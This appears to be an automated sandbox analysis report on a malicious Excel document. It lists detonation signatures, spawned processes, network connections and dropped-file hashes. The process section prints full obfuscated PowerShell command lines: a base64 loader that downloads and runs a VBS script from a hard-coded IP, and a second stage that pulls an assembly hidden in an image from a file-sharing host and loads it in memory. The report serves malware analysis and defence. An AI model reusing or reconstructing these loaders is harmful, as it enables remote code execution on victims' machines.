Analysis Overview
SHA256
a817dfdce631969b109d59bb4f23ead01218c275f94dc04a11151cd9027f2333
Threat Level: Known bad
The file f8136a20dbec93a03aaebaf7d36ff199.bin was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Evasion via Device Credential Deployment
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Drops file in System32 directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Modifies Internet Explorer settings
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Checks processor information in registry
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-14 01:58
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-14 01:58
Reported
2024-11-14 02:01
Platform
win7-20240903-en
Max time kernel
139s
Max time network
147s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | N/A |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a.xls
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE
"C:\Windows\SysTeM32\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE" "powersheLL.Exe -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe ; IEx($(IEX('[SySTem.tEXT.eNcodINg]'+[cHAR]58+[cHar]58+'UTf8.gEtSTrinG([SYSTEm.CONvErt]'+[ChAR]0X3A+[cHar]58+'FrOmbaSe64sTrINg('+[chaR]0X22+'JGQzV3JwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJFckRlRmluaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJrdExTUVhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVYb1FHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJIbGxGLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsb3hDeHF1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdXUik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkJaZ1NrT0N3ZnQiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpXYW1SYUx2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRkM1dycDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTY3L3hhbXBwL25jL3NlZXRoZWJlc3RvcHRpb25zdG91bmRlcnN0YW5kZmFzdHRoaW5nc3RvYmVnZXRiYWNrYmlzY3V0LnRJRiIsIiRlTnY6QVBQREFUQVxzZWV0aGViZXN0b3B0aW9uc3RvdW5kZXJzdGFuZGZhc3R0aGluZ3N0b2JlZ2V0LnZiUyIsMCwwKTtTdEFSdC1TbEVlUCgzKTtzdGFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VldGhlYmVzdG9wdGlvbnN0b3VuZGVyc3RhbmRmYXN0dGhpbmdzdG9iZWdldC52YlMi'+[ChAr]34+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lbcmpz1h.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC3E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBC3D.tmp"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHZlcmJPc0VwcmVmZVJlbmNlLnRvc3RySW5nKClbMSwzXSsnWCctam9JTicnKSgoJ2ZRSGltYWdlVXJsID0gb0xsaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT0yQWFfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblQnKydJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBvTGw7JysnZlFId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0RQPVKFCZHEXDABsonhadorldlYkNsaWUnKyduJysndDtmUUhpbWFnZUJ5JysndGVzID0gZlFId2ViQ2xpZW50LkRvd24nKydsb2FkRGF0YShmUUhpbWEnKydnZVVybCk7ZlFIaW1hJysnZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoZlFIaW1hZ2VCeXRlcyk7ZlFIc3RhcnRGbGFnID0gb0xsPDxCQVNFNjRfU1RBUlQ+Pm9MbDtmUUhlbmRGbGFnID0gb0xsPDxCJysnQVMnKydFNjRfRU5EJysnPj5vTGw7ZlFIc3RhcnRJbmRleCA9JysnIGZRSGknKydtYWdlVGV4dC5JbmRleE9mKGZRSHN0YXJ0RmxhZyk7ZlFIZW5kSW5kJysnZXggPSAnKydmUUhpbWFnZVRleHQuSW5kZXhPZihmUUhlbmRGbGFnKTtmUUhzdGFydEluZGV4IC1nZSAwIC1hbmQgZlEnKydIZW5kSW5kZXggLWd0IGZRSHN0YXJ0SW5kZXg7ZlFIc3RhcnRJbmRleCArPSBmUUhzdGFydEZsYWcuTGVuZ3RoO2ZRSGInKydhc2U2NExlbmd0aCA9IGZRSGVuJysnZEluZGV4IC0gZlFIcycrJ3RhcnRJbmRleDtmJysnUUhiYXNlNjRDb21tYW5kID0gZlFIaW1hZ2VUZXh0LlN1YnN0cmluZyhmUUhzdGFydEluJysnZGV4LCBmUUhiYXNlNjRMZW5ndGgpO2ZRSGJhc2U2NFJldmVyc2VkID0gRQPVKFCZHEXDABsonhadorWpvaW4gKGZRSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAxaVEgRm9yRWFjaC1PYmplY3QgeyBmUUhfIH0pWy0xLi4tKGZRSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ZlFIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhmUScrJ0hiYXNlNjRSZXZlcnNlZCk7ZlFIbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGZRSGNvbW1hbmQnKydCeXRlcyk7ZlFIdmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChvTGxWQUlvTGwpO2ZRSHZhaU1ldGhvZC5JbnZva2UoZlFIbnVsbCwgQChvTGx0eHQuQVNGRVNSVy9jbi9wcG1heC83NjEuODcxLjY0Ljg5MS8vOnB0dGhvTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGFzcG5ldF9jb21waWxlcm9MbCwgb0xsZGVzYXRpdmFkb29MbCwgb0xsZGVzYXRpdmFkb29MbCxvTGxkZXNhdGl2YWRvb0xsLG9MbGRlc2F0aXZhZG9vTGwsb0xsZGVzYXRpdmFkb29MbCxvTGwnKydkZXNhdGl2YWRvb0xsLG9MbGRlc2F0aXZhZG9vTGwsJysnb0xsMW9MbCxvTGxkZXNhdGl2YWRvb0xsKSk7JykuckVwTGFjRSgoW2NoYXJdMTExK1tjaGFyXTc2K1tjaGFyXTEwOCksW3NUUklOZ11bY2hhcl0zOSkuckVwTGFjRSgoW2NoYXJdNDkrW2NoYXJdMTA1K1tjaGFyXTgxKSxbc1RSSU5nXVtjaGFyXTEyNCkuckVwTGFjRSgnZlFIJywnJCcpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 4t.gg | udp |
| KR | 221.146.204.133:443 | 4t.gg | tcp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 88.221.134.89:80 | r10.o.lencr.org | tcp |
| US | 198.46.178.167:80 | 198.46.178.167 | tcp |
| KR | 221.146.204.133:443 | 4t.gg | tcp |
| US | 198.46.178.167:80 | 198.46.178.167 | tcp |
| US | 198.46.178.167:80 | 198.46.178.167 | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.252.157:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 95.100.245.144:80 | www.microsoft.com | tcp |
Files
memory/1848-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/1848-1-0x0000000071EDD000-0x0000000071EE8000-memory.dmp
memory/1984-16-0x0000000002820000-0x0000000002822000-memory.dmp
memory/1848-17-0x0000000002DD0000-0x0000000002DD2000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
| MD5 | 822467b728b7a66b081c91795373789a |
| SHA1 | d8f2f02e1eef62485a9feffd59ce837511749865 |
| SHA256 | af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9 |
| SHA512 | bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
| MD5 | 9bd2efe99229919b8d6dc43d5e0f86fb |
| SHA1 | f268f6e47bd589efc2797d88210ae4f659006118 |
| SHA256 | 935aba64f09e60a6d07a9dabc1d8a65e6882a55ad57f84d5d9debdc3e8404636 |
| SHA512 | 5149ea3429674631d8a62756ce106b6602350f0fb77d0e3816786a2a465f65a545557264bc573b4a0b8de79b3f4a8fcba6870806754feb71c609ebfe0fdc9eb8 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1
| MD5 | 085de3695f14fff3f936f7ee9802ef13 |
| SHA1 | 90a0b513bbf8d9173bcdaf402254c0701397b212 |
| SHA256 | ef90d8b12068a18a3579d0b963e581ede7bf9adde07b4454427a73e5f7bc0345 |
| SHA512 | 714ceae2cc122eaf829023ee52ea9de770111ff7908bba9864ce63309ef6fe52f1ba759d0e10c4858c9be03510f9d264575d8e4acf49d7f5488b43a5829af5b5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1
| MD5 | 242d5065f90e2bc0c080bb9f6364c24c |
| SHA1 | af40d248dbb2044abc0669d20e384838c48569a7 |
| SHA256 | 6c5a2f0f49738a8fa4ce15c3fb8363d43d76a3cdc2dd6becc236af6e8a66d9ef |
| SHA512 | acbabbf7f07be8f3a8e69f87ac56ca41719445666e153062b2d1aac68aace6bb12e58fc79822c9991eec227e3459556d8a31015ab2b56b155ae710d411520cd5 |
C:\Users\Admin\AppData\Local\Temp\CabB04C.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q0WBLVJY\seemybestpartaroundtheworldtogetmethingsfornewone[1].hta
| MD5 | fa26f1bca49d7fac5a0150c69f718b19 |
| SHA1 | d143c88ad2906d1a81c1f06c2d931d04970e0f9e |
| SHA256 | fdfedc9927a45e7728387b3cc323023950295cb66c7273820bcf0d7d9e97d53c |
| SHA512 | 10b0b1c95b26d931857cce2011c6c8d7e40337a899419bdd3e8fd1f90ea8e6837c0dd5ff9f0a2ef5752c3bb2b618290772addf459d54bdf0fb8d036ec52614ec |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | ec542e4d46b26daaf2115589d2d48953 |
| SHA1 | 894e579f6207e46b4e64690fba74c6bd068f5880 |
| SHA256 | f28c440db73e7190080197ce3ad513b4bc23c288358933c62abfee6b301a376e |
| SHA512 | 92299fb1f9c347a36039b6051e1099bddb412941bb6c24d622a32669ff675edd6f4c5d70707e2da6e49015f3501f87c5ab5f5d630cf11d417c8ad354bfded9c1 |
\??\c:\Users\Admin\AppData\Local\Temp\lbcmpz1h.cmdline
| MD5 | cb8e108e6b28166b19c6382308438455 |
| SHA1 | e0846644053dd9ff3721b442e930e00ad22b226d |
| SHA256 | a6f4a5f5c97b55bd38b811aa7fc67e6f06681d55701364ca2684b44ffc1ef933 |
| SHA512 | 5eeb82855d6d11c7d5bfaabf3791948f2445d600cfbdaf68f086a591c6792a1d3cca554f17c6bbbdf67d4ec0cbb8eb42f65a308c57fdcb7f4690145d3dd7bacf |
\??\c:\Users\Admin\AppData\Local\Temp\lbcmpz1h.0.cs
| MD5 | 0b9734ed54c4f41d0c94957b007eb3d5 |
| SHA1 | ebabbb2d826295a994ba691d921a4c7c5ed506d1 |
| SHA256 | 36632527d6cce240e5833d6251632127fd95f085c35a3aa2a363be2f2cbc84fa |
| SHA512 | d32ebc74674dd75c354a9b74324421a2a4af0a2d6feeb3735d3fab857fb488aaf8be88f4687299c614b6e70556b3980ba007ba02abb8e5e341a2cabccdd10b17 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCBC3D.tmp
| MD5 | ae71002d54da4a838ee54e1d9a03431f |
| SHA1 | 08e033f18ec2af9fa51771fcd90becdd00c17701 |
| SHA256 | 7742f85622894968c3d762da011c5ca288404bda0017890b34511fc11f40d981 |
| SHA512 | 79dbbaec86c425541611b1eb5c24c898308739e17ba8582e2661f473f84ba30ba716efaaafe1dcfbafd108c37af03d462905810a8f5259e3326fac6ff8fefeda |
C:\Users\Admin\AppData\Local\Temp\RESBC3E.tmp
| MD5 | 72295721b8862079ce057e8bc89e00d8 |
| SHA1 | 936668d2c6eafe8e3f5c677fb6c8956040e24a6c |
| SHA256 | 7295ec96a820d728b830db39c95ed62ef6539a3ff218551a377f62a6e16094e3 |
| SHA512 | 8a3a883a88654538ee5cdfd8f665a68fbe8e231a2387379876235f2e3098653f4dcb81b41d1807ab3b25fddb3d98ee66be642fe9bd3d91b29290e8a234dffb0a |
C:\Users\Admin\AppData\Local\Temp\lbcmpz1h.dll
| MD5 | 757fc17bb70368acf40a1e6850a33a43 |
| SHA1 | 3beb41c89425a1df4970c80443f6844669ca703b |
| SHA256 | 28edaa1e1730e70169b2084a5f60d80dee10f76c49495f3786a05488cd826448 |
| SHA512 | 6b18bf4219ebe2d2b5d4eb2f0ef7ed8d8dc8b7c77ac4273f3ba4b6c9d1f42b2873bba3f9a36bd4c0e936cc88e68feacf8a09f202b22fcb5f83db5e37463f5a62 |
C:\Users\Admin\AppData\Local\Temp\lbcmpz1h.pdb
| MD5 | ee3aef4422bbc6f8ec2e989a5391e04e |
| SHA1 | 1aa909c3e43662a58446732b88cd3b558e6adcb3 |
| SHA256 | 911055a81aa75b82921029368326e6798cd605720e29ba587e75ce48b9939def |
| SHA512 | 1b9a10fcb3145661f4d1fd407fd8eaa15e2ef65828437f927dcefb088f53e4f931c3e3816a24c22452fdeb00ea62353bd76b68ff1aca5c0747d0b0ff7d89fce4 |
memory/1848-60-0x0000000071EDD000-0x0000000071EE8000-memory.dmp
C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS
| MD5 | 4f46597a54e903c400cac4db5a222ecb |
| SHA1 | 0a2f30da05a532bfbddaba3af235011d60db8fc8 |
| SHA256 | ba78e6d4f42b1aab53a731c9bd0820d2f0278170eb5ef92604f32e92cfcb8246 |
| SHA512 | ffac65a2a99fe7c3883bb82f5736dbcbcdd8e3d8cecd265fda76e7b7d07d266f1f0b11eaa3adcf714a7e50314d3e140e50799e5b52fe2494da05f504912f344a |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-14 01:58
Reported
2024-11-14 02:01
Platform
win10v2004-20241007-en
Max time kernel
145s
Max time network
158s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\mshta.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4808 wrote to memory of 4192 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe |
| PID 4808 wrote to memory of 4192 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe |
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a.xls"
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| GB | 52.109.32.7:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 4t.gg | udp |
| KR | 221.146.204.133:443 | 4t.gg | tcp |
| US | 8.8.8.8:53 | 18.89.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 88.221.135.113:80 | r10.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 7.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.204.146.221.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.135.221.88.in-addr.arpa | udp |
| US | 198.46.178.167:80 | 198.46.178.167 | tcp |
